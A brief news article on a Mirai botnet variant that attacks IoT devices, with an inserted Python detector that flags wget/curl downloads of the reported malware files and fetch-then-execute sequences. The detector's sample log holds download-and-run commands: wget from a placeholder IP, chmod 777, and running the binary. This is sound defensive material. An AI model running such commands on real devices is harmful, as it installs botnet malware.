New Vulnerabilities are being used by the New Mirai variant


A new variant of Mirai is abusing security flaws in devices from D-Link, Netgear, and other vendors. Since February, it has targeted six known and three previously unknown vulnerabilities to infect systems and add them to the botnet network.

More than 60 variants of Mirai are known to take advantage of both known and unknown vulnerabilities in IoT devices.

The latest attacks are based on Mirai's source code, and they target some additional vulnerabilities in IoT devices.

Use of binaries

After initializing, the botnet uses the wget utility to download a shell script from the malware's infrastructure. The shell script then downloads various Mirai binaries and runs them:

  • Lolol[.]sh: Has the ability to delete key folders from the target machine.
  • Install[.]sh: Downloads various files and packages, including files that contain combinations of multiple credentials that are used for brute-force and nbrute.
  • Dark.[arch]: Mainly used for propagation, using the initial exploits of Mirai.
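The download-then-run chain described above can be hunted for in process-execution logs. The following is an added example, not code from the original article: it flags fetches of the file names reported here and any fetched file that is executed shortly afterwards. The log format, host names, addresses and the 300-second window are assumptions made for the illustration.

```python
import re

# File names as reported on this page (defanged there as Lolol[.]sh, Install[.]sh, Dark.[arch]).
REPORTED = re.compile(r"lolol\.sh|install\.sh|dark\.[a-z0-9_]+", re.I)
FETCH = re.compile(r"\b(?:wget|curl)\b.*?(https?://\S+)", re.I)
SHELLS = {"sh", "bash", "ash"}

# Constructed sample records: "<epoch> <host> <command line>". Hosts and addresses are made up.
SAMPLE_LOG = """\
1700000000 cam-01 wget http://198.51.100.7/lolol.sh -O /tmp/lolol.sh
1700000002 cam-01 sh /tmp/lolol.sh
1700000005 cam-01 wget http://198.51.100.7/dark.arm7 -O /tmp/dark.arm7
1700000006 cam-01 chmod 777 /tmp/dark.arm7
1700000007 cam-01 /tmp/dark.arm7
1700000100 nas-02 wget https://updates.example.com/firmware.bin -O /tmp/fw.bin
"""

def parse(log):
    for line in log.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():  # skip malformed lines
            yield int(parts[0]), parts[1], parts[2]

def basename(path):
    return path.split("?")[0].rstrip("/").rsplit("/", 1)[-1].lower()

def executed_file(cmd):
    """Name of the file being run: argv[0], or the script handed to a shell."""
    argv = cmd.split()
    is_shell = basename(argv[0]) in SHELLS and len(argv) > 1
    return basename(argv[1] if is_shell else argv[0])

def detect(log, window=300):
    """Alert on fetches of reported names and on any fetch followed by execution."""
    alerts, fetched = [], {}
    for ts, host, cmd in parse(log):
        m = FETCH.search(cmd)
        if m:
            # Assumption: the file is saved under the URL's basename.
            name = basename(m.group(1))
            fetched[(host, name)] = ts
            if REPORTED.fullmatch(name):
                alerts.append((host, "reported-name-fetch", name))
            continue
        name = executed_file(cmd)
        seen = fetched.get((host, name))
        if seen is not None and ts - seen <= window:
            alerts.append((host, "fetch-then-exec", name))
    return alerts
```

File names are trivial for an operator to change, so the fetch-then-exec rule is the more durable of the two signals; the name match only adds context when it fires.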

Because of this, unpatched connected devices always remain at risk. That is why it is important to apply patches and regularly update IoT devices and their firmware.


By Hrithik Lall
